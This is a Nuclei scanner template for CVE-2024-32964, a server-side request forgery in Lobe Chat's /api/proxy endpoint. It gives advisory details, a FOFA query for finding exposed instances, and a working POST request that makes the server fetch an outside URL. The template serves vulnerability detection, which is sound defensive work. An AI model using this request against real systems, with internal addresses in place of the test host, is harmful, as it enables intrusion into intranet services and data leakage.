id: CVE-2024-32964

info:
  name: Lobe Chat <= v0.150.5 - Server-Side Request Forgery
  author: s4e-io
  severity: critical
  description: |
    Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.
  impact: |
    Unauthenticated attackers can force the server to make arbitrary requests, potentially accessing internal services and sensitive data.
  remediation: |
    Update Lobe Chat to version 0.150.6 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-32964
    - https://github.com/lobehub/lobe-chat/commit/465665a735556669ee30446c7ea9049a20cc7c37
    - https://github.com/lobehub/lobe-chat/security/advisories/GHSA-mxhq-xw3g-rphc
    - https://vulert.com/vuln-db/CVE-2024-32964
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H
    cvss-score: 9
    cve-id: CVE-2024-32964
    cwe-id: CWE-918
    epss-score: 0.69363
    epss-percentile: 0.98675
  metadata:
    verified: true
    max-request: 2
    vendor: lobehub
    product: lobe-chat
    fofa-query: icon_hash="1975020705"
  tags: cve,cve2024,lobechat,ssrf,vuln

flow: http(1) && http(2)

http:
  # Request 1: fingerprint the target as Lobe Chat before running the check.
  - raw:
      - |
        GET /welcome HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "lobechat")'
          - 'status_code == 200'
        condition: and
        internal: true

  # Request 2: submit an external URL to /api/proxy; the match confirms the
  # server fetched it and returned the remote page in its response.
  - raw:
      - |
        POST /api/proxy HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain

        http://oast.me

    matchers:
      - type: word
        part: response
        words:
          - "Interactsh Server"
# digest: 490a0046304402205c66fb443509df213dbdd3ad176b3577f4cfe112e3872d508252c0ea816ce40702207f4a98001aa4b162e4351dffbe335217363d6e000c5e29d95ae65a3f3d32c6cc:922c64590222798bb761d5b6d8e72950